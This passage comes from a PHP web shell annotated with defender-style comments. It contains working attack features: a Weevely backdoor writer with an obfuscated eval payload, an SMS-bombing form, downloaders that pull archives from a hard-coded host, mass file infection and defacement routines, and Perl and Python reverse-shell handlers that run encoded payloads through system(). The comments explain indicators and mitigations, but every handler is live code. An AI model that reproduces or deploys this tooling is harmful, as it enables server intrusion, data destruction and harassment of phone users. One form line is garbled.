        // variable names without PHP interpolating them here.
        $money = "$";
        // Fixed code fragments are stored base64-encoded. NOTE(review):
        // decoded, they appear to read $_COOKIE and eval a base64 payload
        // assembled from cookie values - confirm before relying on this for
        // detection logic.
        $weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
        // Generated guard: the first element of $a must equal the first two
        // password characters and $a must hold more than 3 elements.
        $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
        $weevelybd3 = "$money" . "k='$rest';";
        $weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
        // The assembled source is base64-encoded once more and wrapped in a
        // one-line eval() stub, which is what ends up in the written file.
        $all = "<?php\neval(base64_decode('" . base64_encode($weevelybd1 . $weevelybd2 . $weevelybd3 . $weevelybd4) . "'));\n?>";
        if (file_put_contents($weevdir . '/' . $weevname, $all)) {
            echo "<center><font color='#14ab00' size='3'>Usage: weevely [URL of backdoor] [password]</font></center><br>";
            success("weevely");
        } else {
            error("Failed to write backdoor to $weevdir");
        }
    }
}
  620. ?>
  621. <?php
  622. //Domain information
  623. //Get domains hosted on server from yougetsignal.com
// Reverse-IP page: looks up DNS records for the request's Host header and
// asks a third-party service which other sites share the server. Both steps
// generate outbound traffic from the web server (DNS queries and a plain-HTTP
// request to yougetsignal.com), which is visible in egress logs.
if (isset($_GET['domaininfo'])) {
    echo "<font color='#14ab00' size='3'>";
    $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
    $num = 0;
    $count = sizeof($dns_record);
    echo "<br></b><br>";
    // Walk the records: print NS targets and remember the NS host, the SOA
    // contact and the A-record address.
    while ($num < $count) {
        $name_servers = $dns_record[$num];
        $name_servers2 = $name_servers['type'];
        $name_servers3 = @$name_servers['target'];
        $num++;
        if ($name_servers2 == "NS") {
            echo "$name_servers3<br>";
            $nshost = @$name_servers['host'];
        }
        if ($name_servers2 == "SOA") {
            $nsemail = $name_servers['rname'];
        }
        if ($name_servers2 == "A") {
            $nsip = $name_servers['ip'];
        }
    }
    $num = 0;
    echo "<br><table class='noborder'>
</table><br>";
    // The Host header is appended to the service URL without URL encoding, and
    // the response is decoded without checking that the fetch or the decode
    // succeeded.
    $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
    $status = $domains_on_server->status;
    $message = $domains_on_server->message;
    $domainAr = $domains_on_server->domainArray;
    $num_of_site = $domains_on_server->domainCount;
    $count = sizeof($domainAr);
    if ($status == "Success") {
        // $nshost and $nsip are only set when matching records were found.
        echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
        // Two domains per table row: $num advances twice per iteration, and
        // each domain is resolved again locally to show its address. With an
        // odd number of entries the last row reads one index past the end.
        while ($num < $count) {
            $hossites = $domainAr[$num];
            $num++;
            $hossites3 = $domainAr[$num];
            $hossites3 = $hossites3[0];
            $hossites = $hossites[0];
            $site_ips = empty($hossites) ? "" : "(" . gethostbyname($hossites) . ")";
            $site_ips2 = empty($hossites3) ? "" : "(" . gethostbyname($hossites3) . ")";
            // Names returned by the remote service are written into the page
            // without HTML escaping.
            echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
            $num++;
        }
        echo "</table><br>";
        $num = 0;
    } else {
        error("Failed to find or get sites hosted on same server from: <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
    }
    echo "</font><br>";
}
  675. ?>
  676. <?php
  677. //SMS Bomber stuff
// Message-flooding handler: abuses the server's mail() facility to send the
// same message repeatedly to an e-mail-to-SMS gateway address. For the host
// owner the impact is outbound mail abuse (blacklisting of the server's IP);
// a spike of mail from the web-server account to carrier gateway domains is
// the signal to look for in the MTA logs.
if (isset($_POST['do_bomb_sms'])) {
    $phonenum = $_POST['phnumber'];
    $carrier = $_POST['carrier'];
    $amount = $_POST['numberof'];
    $from = $_POST['from'];
    // The From value is placed into the header block unfiltered, so CR/LF in
    // the field would add further mail headers.
    $headers = "From: $from\r\n";
    $headers.= 'MIME-Version: 1.0' . "\n";
    $headers.= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
    $subject = $_POST['subject'];
    // Recipient = phone number followed by the carrier's gateway domain
    // (the option values of the form start with "@").
    $to = "$phonenum$carrier";
    $numsent = 0;
    $sent_fail = 0;
    $sent_success = 0;
    $msgcontent = $_POST['message_content'];
    if (empty($phonenum) OR empty($amount) OR empty($from) OR empty($subject) OR empty($msgcontent)) {
        error("All Fields Must Entered!");
    } else {
        // Send loop: the count comes from the request with no upper bound or
        // delay; failures and successes are tallied separately.
        while ($numsent < $amount) {
            if (!@mail($to, $subject, $msgcontent, $headers)) {
                $numsent++;
                $sent_fail++;
            } else {
                $numsent++;
                $sent_success++;
            }
        }
        echo "<font color='#14ab00'>Successfully sent $sent_success messages.<br>
Failed to send $sent_fail messages.<br>";
    }
}
  708. if (isset($_GET['sms'])) {
           // Renders the input form for the do_bomb_sms handler (on ?sms). The carrier <option>
           // values are the domain suffixes that the handler appends to the phone number to build
           // the mail() recipient. Field names here (phnumber, carrier, numberof, from, subject,
           // message_content, do_bomb_sms) are what shows up in POST bodies to this script.
  709.     echo "<font color='#14ab00'>
  710. <table class='noborder'>
  711. <tr>
  712. <form action='' method='post'>
  713. <td>Phone Number With Area Code</td>
  714. <td><input type='text' name='phnumber' class='text'></td>
  715. </tr>
  716. <tr>
  717. <td>Carrier:</td>
  718. <td>
  719. <select name='carrier'>
  720. <option value='@sms.3rivers.net'>3 River Wireless</option>
  721. <option value='@paging.acswireless.com'>ACS Wireless</option>
  722. <option value='@advantagepaging.com'>Advantage Communications</option>
  723. <option value='@airtelkk.com'>Airtel (Karnataka, India)</option>
  724. <option value='@sms.airtelmontana.com'>Airtel Wireless (Montana, USA)</option>
  725. <option value='@airtouch.net'>Airtouch Pagers</option>
  726. <option value='@airtouchpaging.com'>Airtouch Pagers</option>
  727. <option value='@alphapage.airtouch.com'>Airtouch Pagers</option>
  728. <option value='@myairmail.com'>Airtouch Pagers</option>
  729. <option value='@msg.acsalaska.com'>Alaska Communications Systems</option>
  730. <option value='@message.alltel.com'>Alltel</option>
  731. <option value='@alphanow.net'>AlphaNow</option>
  732. <option value='@page.americanmessaging.net'>American Messaging</option>
  733. <option value='@clearpath.acswireless.com'>Ameritech Clearpath</option>
  734. <option value='@paging.acswireless.com'>Ameritech Paging</option>
  735. <option value='@pageapi.com'>Ameritech Paging</option>
  736. <option value='@airtelap.com'>Andhra Pradesh Airtel</option>
  737. <option value='@text.aql.com'>Aql</option>
  738. <option value='@archwireless.net'>Arch Pagers (PageNet)</option>
  739. <option value='@epage.arch.com'>Arch Pagers (PageNet)</option>
  740. <option value='@mobile.att.net'>AT&T</option>
  741. <option value='@txt.att.net'>AT&T2</option>
  742. <option value='@page.att.net'>AT&T Enterprise Paging</option>
  743. <option value='@mmode.com'>AT&T Free2Go</option>
  744. <option value='@mobile.att.net'>AT&T PCS</option>
  745. <option value='@dpcs.mobile.att.net'>AT&T Pocketnet PCS</option>
  746. <option value='@sms.beemail.ru'>BeeLine GSM</option>
  747. <option value='@beepwear.net'>Beepwear</option>
  748. <option value='@message.bam.com'>Bell Atlantic</option>
  749. <option value='@bellmobility.ca'>Bell Canada</option>
  750. <option value='@txt.bellmobility.ca'>Bell Canada2</option>
  751. <option value='@txt.bell.ca'>Bell Mobility (Canada)</option>
  752. <option value='@bellsouth.cl'>Bell South</option>
  753. <option value='@blsdcs.net'>Bell South2</option>
  754. <option value='@sms.bellsouth.com'>Bell South3</option>
  755. <option value='@wireless.bellsouth.com'>Bell South4</option>
  756. <option value='@bellsouthtips.com'>Bell South (Blackberry)</option>
  757. <option value='@blsdcs.net'>Bell South Mobility</option>
  758. <option value='@tachyonsms.co.uk'>BigRedGiant Mobile Solutions</option>
  759. <option value='@blueskyfrog.com'>Blue Sky Frog</option>
  760. <option value='@sms.bluecell.com'>Bluegrass Cellular</option>
  761. <option value='@myboostmobile.com'>Boost</option>
  762. <option value='@bplmobile.com'>BPL Mobile</option>
  763. <option value='@@bplmobile.com'>BPL Mobile (Mumbai, India)</option>
  764. <option value='@cmcpaging.com'>Carolina Mobile</option>
  765. <option value='@cwwsms.com'>Carolina West Wireless</option>
  766. <option value='@cell1.textmsg.com'>Cellular One</option>
  767. <option value='@cellularone.textmsg.com'>Cellular One2</option>
  768. <option value='@message.cellone-sf.com'>Cellular One3</option>
  769. <option value='@mobile.celloneusa.com'>Cellular One4</option>
  770. <option value='@sbcemail.com'>Cellular One5</option>
  771. <option value='@phone.cellone.net'>Cellular One (East Coast)</option>
  772. <option value='@swmsg.com'>Cellular One (South West)</option>
  773. <option value='@mycellone.com'>Cellular One (West)</option>
  774. <option value='@paging.cellone-sf.com'>Cellular One PCS</option>
  775. <option value='@csouth1.com'>Cellular South</option>
  776. <option value='@cwemail.com'>Centennial Wireless</option>
  777. <option value='@cvcpaging.com'>Central Vermont</option>
  778. <option value='@messaging.centurytel.net'>CenturyTel</option>
  779. <option value='@rpgmail.net'>Chennai RPG Cellular</option>
  780. <option value='@airtelchennai.com'>Chennai Skycell / Airtel</option>
  781. <option value='@gocbw.com'>Cincinnati Bell</option>
  782. <option value='@cingularme.com'>Cingular</option>
  783. <option value='@mms.cingularme.com'>Cingular2</option>
  784. <option value='@mycingular.com'>Cingular3</option>
  785. <option value='@page.cingular.com'>Cingular5</option>
  786. <option value='@txt.att.net'>Cingular (Now AT&T)</option>
  787. <option value='@clarotorpedo.com.br'>Claro (Brasil)</option>
  788. <option value='@ideasclaro-ca.com'>Claro (Nicaragua)</option>
  789. <option value='@msg.clearnet.com'>Clearnet</option>
  790. <option value='@comcastpcs.textmsg.com'>Comcast</option>
  791. <option value='@comcel.com.co'>Comcel</option>
  792. <option value='@sms.comviq.se'>Comviq</option>
  793. <option value='@cookmail.com'>Cook Paging</option>
  794. <option value='@corrwireless.net'>Corr Wireless Communications</option>
  795. <option value='@sms.mycricket.com'>Cricket</option>
  796. <option value='@sms.ctimovil.com.ar'>CTI</option>
  797. <option value='@airtelmail.com'>Delhi Aritel</option>
  798. <option value='@delhi.hutch.co.in'>Delhi Hutch</option>
  799. <option value='@page.hit.net'>Digi-Page / Page Kansas</option>
  800. <option value='@mobile.dobson.net'>Dobson</option>
  801. <option value='@sms.orange.nl'>Dutchtone / Orange-NL</option>
  802. <option value='@sms.edgewireless.com'>Edge Wireless</option>
  803. <option value='@sms.emt.ee'>EMT</option>
  804. <option value='@emtelworld.net'>Emtel (Mauritius)</option>
  805. <option value='@escotelmobile.com'>Escotel</option>
  806. <option value='@fido.ca'>Fido</option>
  807. <option value='@epage.gabrielwireless.com'>Gabriel Wireless</option>
  808. <option value='@sendabeep.net'>Galaxy Corporation</option>
  809. <option value='@webpager.us'>GCS Paging</option>
  810. <option value='@msg.gci.net'>General Communications Inc.</option>
  811. <option value='@t-mobile-sms.de'>German T-Mobile</option>
  812. <option value='@msg.globalstarusa.com'>Globalstar (satellite)</option>
  813. <option value='@bplmobile.com'>Goa BPLMobil</option>
  814. <option value='@sms.goldentele.com'>Golden Telecom</option>
  815. <option value='@epage.porta-phone.com'>GrayLink / Porta-Phone</option>
  816. <option value='@celforce.com'>Gujarat Celforce</option>
  817. <option value='@messaging.sprintpcs.com'>Helio</option>
  818. <option value='@text.houstoncellular.net'>Houston Cellular</option>
  819. <option value='@ideacellular.net'>Idea Cellular</option>
  820. <option value='@ivctext.com'>Illinois Valley Cellular</option>
  821. <option value='@page.infopagesystems.com'>Infopage Systems</option>
  822. <option value='@inlandlink.com'>Inland Cellular Telephone</option>
  823. <option value='@msg.iridium.com'>Iridium (satellite)</option>
  824. <option value='@rek2.com.mx'>Iusacell</option>
  825. <option value='@jsmtel.com'>JSM Tele-Page</option>
  826. <option value='@msg.koodomobile.com'>Koodo Mobile (Canada)</option>
  827. <option value='@mci.com'>MCI Phone</option>
  828. <option value='@sms.mymeteor.ie'>Meteor</option>
  829. <option value='@metropcs.sms.us'>Metro PCS</option>
  830. <option value='@clearlydigital.com'>Midwest Wireless</option>
  831. <option value='@mobilecomm.net'>Mobilcomm</option>
  832. <option value='@text.mtsmobility.com'>MTS</option>
  833. <option value='@sms.netcom.no'>Netcom</option>
  834. <option value='@messaging.nextel.com'>Nextel</option>
  835. <option value='@o2.co.uk'>O2</option>
  836. <option value='@o2imail.co.uk'>O2#2</option>
  837. <option value='@mmail.co.uk'>O2 (M-mail)</option>
  838. <option value='@orange.net'>Orange</option>
  839. <option value='@qwestmp.com'>Qwest</option>
  840. <option value='@pcs.rogers.com'>Rogers</option>
  841. <option value='@sms.sasktel.com'>Sasktel (Canada)</option>
  842. <option value='@mysmart.mymobile.ph'>Smart Telecom</option>
  843. <option value='@messaging.sprintpcs.com'>Sprint</option>
  844. <option value='@tms.suncom.com'>Sumcom</option>
  845. <option value='@tmomail.net'>T-Mobile</option>
  846. <option value='@t-mobile.uk.net'>T-Mobile (UK)</option>
  847. <option value='@t-d1-sms.de'>T-Mobile Germany</option>
  848. <option value='@txt.att.net'>Tracfone</option>
  849. <option value='@mmst5.tracfone.com'>Tracfone (prepaid)</option>
  850. <option value='@vtext.com'>Verizon</option>
  851. <option value='@vmobl.com'>Virgin Mobile</option>
  852. <option value='@vmobile.ca'>Virgin Mobile (Canada)</option>
  853. <option value='@vodafone.net'>Vodafone UK</option>
  854. </select>
  855. </td>
  856. </tr>
  857. <tr>
  858. <td>Amount Of Messages To Send:</td>
  859. <td><input type='text' name='numberof' size='10' class='text'></td>
  860. </tr>
  861. <tr>
  862. <td>From:</td>
  863. <td><input type='text' name='from' class='text'></td>
  864. </tr>
  865. <tr>
  866. <td>Subject:</td>
  867. <td><input type='text' size='85' class='text' name='subject'></td>
  868. </tr>
  869. </table>
  870. Message Content:<br>
  871. <textarea rows='20' cols='150' name='message_content' style='color:#00ff00'>
  872. </textarea><br>
  873. <input type='submit' name='do_bomb_sms' value='Bomb'><br>
  874. </form><br></font><br>";
  875. }
  876. ?>
  877. <?php
  878. // Menu for the database-dump tool installers: on ?installMySQL, prints links to the two installer forms (?msd1 and ?msd2).
  879. if (isset($_GET['installMySQL'])) {
  880.     echo "<center>
  881. <font size='4'>
  882. <a href='?msd1' class='navbar'>Install MySQL Dumper v2.0 By: Plum</a>
  883. <br>
  884. <br>
  885. <a href='?msd2' class='navbar'>Install MySQL Dumper v1.24.4 (Original MSD)</a>
  886. </font>
  887. </center>
  888. <br>";
  889. }
  890. // Installer, variant 1 ("MySQL Dumper v2.0" per the menu text). ?msd1 prints a form asking for a
       // target directory (default "$dir/msd"); POST installmsd1 performs the install.
       // The handler creates the posted directory with mode 0777 if missing, downloads a zip archive
       // over plain HTTP from a hard-coded host, writes it as msdv2.zip in that directory and passes
       // it to unzip() (defined elsewhere in this file). The download result is not checked before
       // it is written.
       // Defender note: indicators are the PHP process making an outbound HTTP fetch of an archive,
       // a newly created world-writable directory under the web root, and msdv2.zip with its
       // extracted contents. Disabling allow_url_fopen stops file_get_contents() from fetching URLs,
       // and egress filtering on web hosts blocks the download regardless of PHP settings.
  891. if (isset($_GET['msd1'])) {
  892.     echo "<center>
  893. <font color='#14ab00' size='3'>
  894. Directory to install to:<br>
  895. If directory does not exist it will attempt to create it.
  896. <form action='' method='post'>
  897. <input type='text' name='msd1dir' class='text' size='50' value='$dir/msd'>
  898. <input type='submit' name='installmsd1' value='Install'>
  899. <form>
  900. </font>
  901. </center>
  902. <br>";
  903. }
  904. if (isset($_POST['installmsd1'])) {
           // Target path comes straight from the request; only a trailing "/" is trimmed.
  905.     $msd1dir = rtrim($_POST['msd1dir'], "/");
  906.     $msd1dir2 = "$msd1dir/msdv2.zip";
  907.     if (!is_dir($msd1dir)) {
  908.         if (!mkdir($msd1dir, 0777)) {
  909.             error("Failed to make directory $msd1dir");
  910.         }
  911.     }
  912.     $link = file_get_contents("http://p0wersurge.com/msdv2.zip");
  913.     if (file_put_contents($msd1dir2, $link)) {
  914.         unzip($msd1dir2, $msd1dir);
  915.     } else {
  916.         error("Could not write to $msd1dir");
  917.     }
  918. }
  919. // Installer, variant 2 ("MySQL Dumper v1.24.4" per the menu text). Same flow as variant 1:
       // ?msd2 prints the directory form, POST installmsd2 creates the posted directory (0777) if
       // missing, downloads msd.zip over plain HTTP from the same hard-coded host, writes it into
       // that directory and calls unzip() (defined elsewhere in this file).
       // Defender note: same indicators as variant 1, with msd.zip as the archive name; an unexpected
       // database-dump tool inside a web root warrants checking which database credentials the
       // compromised account could read.
  920. if (isset($_GET['msd2'])) {
  921.     echo "<center>
  922. <font color='#14ab00' size='3'>
  923. Directory to install to:<br>
  924. If directory does not exist it will attempt to create it.
  925. <form action='' method='post'>
  926. <input type='text' name='msd2dir' class='text' size='50' value='$dir/msd'>
  927. <input type='submit' name='installmsd2' value='Install'>
  928. <form>
  929. </font>
  930. </center>
  931. <br>";
  932. }
  933. if (isset($_POST['installmsd2'])) {
           // Target path comes straight from the request; only a trailing "/" is trimmed.
  934.     $msd2dir = rtrim($_POST['msd2dir'], "/");
  935.     $msd2dir2 = "$msd2dir/msd.zip";
  936.     if (!is_dir($msd2dir)) {
  937.         if (!mkdir($msd2dir, 0777)) {
  938.             error("Failed to make directory $msd2dir");
  939.         }
  940.     }
  941.     $link = file_get_contents("http://p0wersurge.com/msd.zip");
  942.     if (file_put_contents($msd2dir2, $link)) {
  943.         unzip($msd2dir2, $msd2dir);
  944.     } else {
  945.         error("Could not write to $msd2dir");
  946.     }
  947. }
  948. ?>
  949. <?php
  950. // Mass file modification handler: on POST do_mass_infect, rewrites every path returned by
       // files($mddir) (helper defined elsewhere in this file) so that the posted text comes first
       // and the file's previous contents follow. $mddir is either $rootdir or the posted custom
       // directory. The path "$dir/$script2" is skipped (the form text says this is the shell itself).
       // Defender note: each touched file is rewritten in place, so its hash, size and mtime change
       // and the foreign content sits ahead of the original first line. File-integrity monitoring,
       // read-only or differently-owned code directories, and comparison against a known-good
       // deployment are the practical ways to detect and undo this; clean-up means restoring files,
       // not just removing the shell.
  951. if (isset($_POST['do_mass_infect'])) {
  952.     $masscode = " " . $_POST['massinfect_code'] . "\n";
  953.     $inf_dir = $_POST['infect_dir'];
  954.     $infcustom_dir = $_POST['cinfect_dir'];
  955.     $infcustom_dir = rtrim($infcustom_dir, "/");
  956.     $failed = 0;
  957.     $success = 0;
  958.     if (empty($masscode)) {
  959.         error("You must enter a code to infect files with!");
  960.     } elseif (empty($infcustom_dir) && $inf_dir == "custom") {
  961.         error("You must enter a custom directory when using the Custom option!");
  962.     } else {
  963.         if ($inf_dir == "root") {
  964.             $mddir = $rootdir;
  965.         }
  966.         if ($inf_dir == "custom") {
  967.             $mddir = $infcustom_dir;
  968.         }
  969.         foreach (files($mddir) as $key => $file) {
  970.             $file2 = trim($file, ".");
                   // Original contents are held only in memory between the two writes below.
  971.             $getinf_file = file_get_contents($file2);
  972.             if ("$file2" == "$dir/$script2") {
  973.                 echo "";
  974.             } else {
                       // First write replaces the file with the posted text; second appends the old contents.
  975.                 if (file_put_contents("$file2", $masscode) && file_put_contents("$file2", $getinf_file, FILE_APPEND)) {
  976.                     echo "<font color='green'><b>Successfully infected file: $file2</b></font><br>";
  977.                     $success++;
  978.                 } else {
  979.                     echo "<font color='red'><b>Failed to infect file: $file2</b></font><br>";
  980.                     $failed++;
  981.                 }
  982.             }
  983.         }
  984.         echo "<font color='#14ab00'><b>$success files successfully infected! ^_^<br>Failed to infect $failed files! :( </b></font><br>";
  985.     }
  986. }
  987. if (isset($_GET['massinfect'])) {
           // Renders the form for the do_mass_infect handler (on ?massinfect). The two example strings
           // are passed through htmlspecialchars() so the browser shows them as text. Field names
           // posted by this form: infect_dir, cinfect_dir, massinfect_code, do_mass_infect.
  988.     $example = "<?php system() ?>";
  989.     $example = htmlspecialchars($example);
  990.     $example2 = "<script>alert()</script>";
  991.     $example2 = htmlspecialchars($example2);
  992.     echo "<center>
  993. <font color='#14ab00'>
  994. <form action='' method='post'>
  995. Directory to start infect from:<br>
  996. <select name='infect_dir'>
  997. <option value='root'>Root</option>
  998. <option value='custom'>Custom</option>
  999. </select><br>
  1000. Custom Directory: <input class='text' type='text' name='cinfect_dir' size='40'><br>
  1001. This is great for infecting mass files with javascript scripts or php scripts<br>
  1002. It will append the code to the top of each file.<br>
  1003. Example:<br>
  1004. $example<br>
  1005. $example2<br>
  1006. Infect code:<br>
  1007. <textarea rows='20' cols='150' name='massinfect_code' style='color:#000'>
  1008. </textarea><br>
  1009. This will not infect this shell.<br>
  1010. <input type='submit' name='do_mass_infect' value='Infect'><br>
  1011. </form>
  1012. </font>
  1013. </center>";
  1014. }
  1015. ?>
  1016. <?php
  1017. // Mass overwrite handler: on POST do_mass_deface, replaces the full contents of every path
        // returned by files($mddir) (helper defined elsewhere in this file) with the posted text.
        // $mddir is either $rootdir or the posted custom directory; "$dir/$script2" is skipped.
        // Defender note: unlike the mass-infect handler, nothing of the original file is kept, so
        // recovery depends entirely on backups or redeployment. Afterwards the affected files all
        // carry identical content, which makes the blast radius easy to enumerate by hash or size.
  1018. if (isset($_POST['do_mass_deface'])) {
            // Undo magic-quotes escaping where the runtime still applies it.
  1019.     if (get_magic_quotes_gpc()) {
  1020.         $mass_source = stripslashes($_POST['massdeface_source']);
  1021.     } else {
  1022.         $mass_source = $_POST['massdeface_source'];
  1023.     }
  1024.     $def_dir = $_POST['deface_dir'];
  1025.     $custom_dir = $_POST['custom_dir'];
  1026.     $custom_dir = rtrim($custom_dir, "/");
  1027.     $failed = 0;
  1028.     $success = 0;
  1029.     if (empty($mass_source)) {
  1030.         error("You must enter a source!");
  1031.     } elseif (empty($custom_dir) && $def_dir == "custom") {
  1032.         error("You must enter a custom directory when using the Custom option!");
  1033.     } else {
  1034.         if ($def_dir == "root") {
  1035.             $mddir = $rootdir;
  1036.         }
  1037.         if ($def_dir == "custom") {
  1038.             $mddir = $custom_dir;
  1039.         }
  1040.         foreach (files($mddir) as $key => $file) {
  1041.             $file2 = trim($file, ".");
  1042.             if ("$file2" == "$dir/$script2") {
  1043.                 echo "";
  1044.             } else {
  1045.                 if (file_put_contents("$file2", $mass_source)) {
  1046.                     echo "<font color='green'><b>Successfully defaced file: $file2</b></font><br>";
  1047.                     $success++;
  1048.                 } else {
  1049.                     echo "<font color='red'><b>Failed to deface file: $file2</b></font><br>";
  1050.                     $failed++;
  1051.                 }
  1052.             }
  1053.         }
  1054.         echo "<font color='#14ab00'><b>$success files successfully defaced!<br>Failed to deface $failed files!</b></font><br>";
  1055.     }
  1056. }
  1057. if (isset($_GET['massdeface'])) {
            // Renders the form for the do_mass_deface handler (on ?massdeface). Field names posted
            // by this form: deface_dir, custom_dir, massdeface_source, do_mass_deface.
  1058.     echo "<center>
  1059. <font color='#14ab00'>
  1060. <form action='' method='post'>
  1061. Directory to start deface from:<br>
  1062. <select name='deface_dir'>
  1063. <option value='root'>Root</option>
  1064. <option value='custom'>Custom</option>
  1065. </select><br>
  1066. Custom Directory: <input class='text' type='text' name='custom_dir' size=security'40'><br>
  1067. Source of deface:<br>
  1068. <textarea rows='20' cols='150' name='massdeface_source' style='color:#7FFF00'>
  1069. </textarea><br>
  1070. This will not deface this shell.<br>
  1071. <input type='submit' name='do_mass_deface' value='Deface'><br>
  1072. </form>
  1073. </font>
  1074. </center>";
  1075. }
  1076. ?>
  1077. <?php
  1078. if(isset($_GET['perlbackconnect']))
        // "Back connect" feature, Perl variant. On ?perlbackconnect it shows a form pre-filled with
        // the requester's address ($_SERVER['REMOTE_ADDR']); on POST sbm it base64-decodes and
        // inflates the embedded blob, writes the result to backconn.pl in the current working
        // directory, runs chmod +x on it and then runs it with perl, passing the posted ip and port
        // as arguments. The blob's contents are not decoded in this review.
        // Defender note: indicators are a backconn.pl file next to web content, the web-server or
        // PHP user spawning chmod and perl through a shell, and an outbound connection from that
        // child process to an external address. Blocking system() through PHP's disable_functions,
        // egress filtering on web hosts and process-lineage alerting each interrupt this path.
  1079. { ?>
  1080. <font size=2 face="comic sans ms" color=white>
  1081. <p><form method=POST action="">
  1082. Client ip:<input type=text name=ip value=<?php echo $_SERVER['REMOTE_ADDR'];?>>
  1083. Connection Port:<input type=text name=port /><p>
  1084. <input type=submit name=sbm value="Connect" /></form>
  1085. </font>
  1086. <?php
  1087.  
  1088.  
  1089. if(isset($_POST['sbm']))
  1090. {
            // Both values are taken from the request unvalidated and later concatenated into a shell command line.
  1091.     $r=$_POST["ip"];
  1092.     $s=$_POST["port"];
  1093.     $p1 ='hVNhb5swEP0eKf/hSqsFpNCE9sOkRFTLUtKibU0FJJrEUGTgWlCJHWGzJZr234dNqBKlVY0E9rtnv3e+4/xsUPFyEOd0sMGy6Ha6nYojuPPRyGfJC4qxhC74jgtcgw09RY0Jz3pNZOLdTe0v9Xup1psypwI0ME3bDsOvJHmZMkoxEeBnWBRRZNumCb/onhCzLbA/FFOIdxAgWYNL05wfUWsyaOrw/Al0JXhmXxnwV0KwF1xw8owjuBhCeM+4iCB8ZGX9kdubzZDmCJqzVSTr6vPlsH4ssK6ta2g5/9r8D3KXy1le4D2haYEK4iqq+/PpNyfow+Ns5T7IiQRWfuA5kx99eEaxKZlg8Y6SNeo9kWx6hgGsVEb2tkMzggUlcYEgGHjIWfEbQWbQWkqa63sVk9okTctVTtVdLEMr6kNOUayIYC02jIwPtNqyHGo1VZazRs28IZVgT0XFM91QDLZBqvvBrfvQB+3mU0PTjmPzRdB/L+Z43kms9Sfr/Nb4qJUOvetaRTnWWbl+MHO/O2No1v5k6UgMxphkrAbrkoBJYPw6VQF10t5W28nv+ak7d37Suf5J5761N61SvFSjQMEhwy2ILOfAs1zAz1s4POAou/1/2Bg8d+azbuc/';
  1094.    
           // Decoded payload is written to disk; the handle is neither checked nor closed in this block.
  1095.    $dec= gzinflate(base64_decode($p1));
  1096.    $fname = fopen('backconn.pl','w');
  1097.      fwrite($fname,$dec);
  1098.       $d="backconn.pl";
  1099.      $ch="chmod +x ".$d ;
  1100.             $permission= system($ch);
  1101.            
                    // system() runs the command through the shell and prints its output into the response.
  1102.             $z="perl ".$d." ".$r." ".$s;
  1103.             $run= system($z);
  1104.    
  1105.  }  
  1106.  
  1107. }
  1108. ?>
  1109. <?php
  1110. if(isset($_GET['pythonbackconnect']))
  1111. {
            // Renders the form for the Python "back connect" handler (on ?pythonbackconnect),
            // pre-filled with the requester's address. Field names posted: pyt, port, pyb.
  1112.     ?>
  1113. <form method=POST>
  1114. Client ip:<input type=text name=pyt value=<?php echo $_SERVER['REMOTE_ADDR'];?>>
  1115. port:<input type=text name=port /><p>
  1116. <input type=submit name=pyb value="Connect" /></form>
  1117. </font>
  1118. <?php
  1119. }
  1120. ?>
  1121. <?php
  1122. if(isset($_POST['pyb']))
        // "Back connect" handler, Python variant. On POST pyb it base64-decodes and inflates the
        // embedded blob, writes the result to backconn.py in the current working directory, runs
        // chmod +x on it and then runs it with python, passing the posted address and port as
        // arguments. The blob's contents are not decoded in this review.
        // Defender note: same indicators as the Perl variant, with backconn.py as the dropped file
        // and python as the child process of the web-server or PHP user.
  1123. {
            // Both values are taken from the request unvalidated and later concatenated into a shell command line.
  1124.     $r=$_POST["pyt"];
  1125.     $s=$_POST["port"];
  1126.     $py = 'fVLfS8MwEH4X/B9u9WEptJ1O8UEouI0JIjpwe+vK6I/bGpYmJUnV+tebrF2dIEsgucv33eXj7q4Go1rJUUr5qGp0IfjlRbtpWQmpQTXKAyWyPWoPhLXrtJIiQ6WOzEIoDaFlBoncfUQ3sX09RIdAuSY9Mo7dY1CbMlCoc9wmNdOalihqTe6ve45BIM2I+2AdAC2bzgKjaG+/7JIcLtJ5k6fN89t85XXucjF72SxX7/PJq3sSHWSCc8w0IVa+Z9W6f3CFPCfD4fD41q4cP5CJCiWILeiCKlCZpJUGY6V3TCffiXzclQll5oMS1vxv+Ony/TCMoqn4gsUnxxymDawwKeGZ53RZIGNxHIa+b3KsudHRixMqyOtqTKzILWXIBXG96/PwzXl4fB6+/S2M1WUL3w9BkCWMkcg5TJAqHM/xqRN3AfiVoalN14muw30PK2mGA5xoEMOsbQYVHCwrB8Nz/suBUgrpAf6XZG4x+CyMbOi6S/nOMeyWbE87Tj8=';
  1127.    
  1128.    $dec= gzinflate(base64_decode($py));
  1129.    $fname = fopen('backconn.py','w');
  1130.      fwrite($fname,$dec);
  1131.       $d="backconn.py";
  1132.      $ch="chmod +x ".$d ;
  1133.             $permission= system($ch);
  1134.            
                    // system() runs the command through the shell and prints its output into the response.
  1135.             $z="python ".$d." ".$r." ".$s;
  1136.             $run= system($z);
  1137.    
  1138.  }    
  1139. ?>
  1140. <?php
  1141. // File browser. Prints a breadcrumb for $dir, then one table row per entry in $direcs and
        // $files (both populated elsewhere in this file) showing owner/group, permissions,
        // writability, size and modification time, with delete/rename links and a checkbox that
        // feeds the mass Delete/chmod form at the bottom.
        // Names and paths are interpolated into HTML and URLs without escaping.
